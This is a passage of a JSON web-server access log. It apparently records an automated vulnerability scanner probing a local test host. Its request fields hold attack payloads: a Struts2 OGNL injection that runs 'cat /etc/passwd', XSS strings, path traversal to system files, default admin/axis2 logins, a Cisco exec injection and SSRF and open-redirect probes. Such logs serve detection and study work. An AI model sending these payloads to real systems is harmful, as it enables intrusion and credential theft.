%64%65%64%43%6c%61%73%73%65%73%28%29%2e%63%6c%65%61%72%28%29%29%2e%28%23%63%6f%6e%74%65%78%74%2e%73%65%74%4d%65%6d%62%65%72%41%63%63%65%73%73%28%23%64%6d%29%29%29%29%2e%28%23%71%3d%40%6f%72%67%2e%61%70%61%63%68%65%2e%63%6f%6d%6d%6f%6e%73%2e%69%6f%2e%49%4f%55%74%69%6c%73%40%74%6f%53%74%72%69%6e%67%28%40%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%40%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%2e%28%23%71%29%7d&age=10&__checkbox_bustedBefore=true&description=\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /integration/saveGangster.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.xz HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///etc/passwd\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opennms/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/hdw-tube/mychannel.php?channel=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"var={\x22body\x22:{\x22file\x22:\x22file:///c://windows/win.ini\x22}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"loginUsername=admin&loginPassword=axis2","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/magmi.php?configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1.24/version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"userName=admin&password=axis2&submit=+Login+","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /axis2/axis2-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /view/viewer_index.shtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.1.sql.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /messages HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/sdcall/Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pics/logo_70x29px.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.7z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /WEB_VMS/LEVEL15/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cucm-uds/users HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET \x5C..\x5C..\x5C..\x5C..\x5CWindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"-", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /0.bz2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WAN_wan.htm?.gif HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%83%BCexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:26:17 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 